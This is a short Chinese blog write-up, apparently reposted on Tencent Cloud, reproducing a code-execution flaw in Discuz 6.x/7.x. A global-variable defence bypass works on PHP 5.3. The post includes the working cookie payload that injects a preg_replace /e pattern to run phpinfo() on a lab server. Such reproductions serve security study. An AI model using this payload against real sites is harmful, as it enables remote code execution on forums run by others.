Discuz 7.x/6.x 全局变量防御绕过导致代码执行漏洞复现
Discuz 7.x/6.x 全局变量防御绕过导致代码执行漏洞复现
渗透攻击红队
发布于 2019-11-20 11:57:11
发布于 2019-11-20 11:57:11
网络安全/渗透测试/代码审计/
关注
Disuz 7.x/6.x全局变量防御绕过导致代码执行
漏洞概述
由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞
漏洞分析
https://www.secpulse.com/archives/2338.html
漏洞复现
首先来到一个已存在的帖子:
http://192.168.1.104:8080/viewthread.php?tid=13&extra=page%3D1
打开BurpSuite抓包:
在Cookie中增加:
GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
从上图可以看到,phpinfo已成功执行!
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-10-20,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读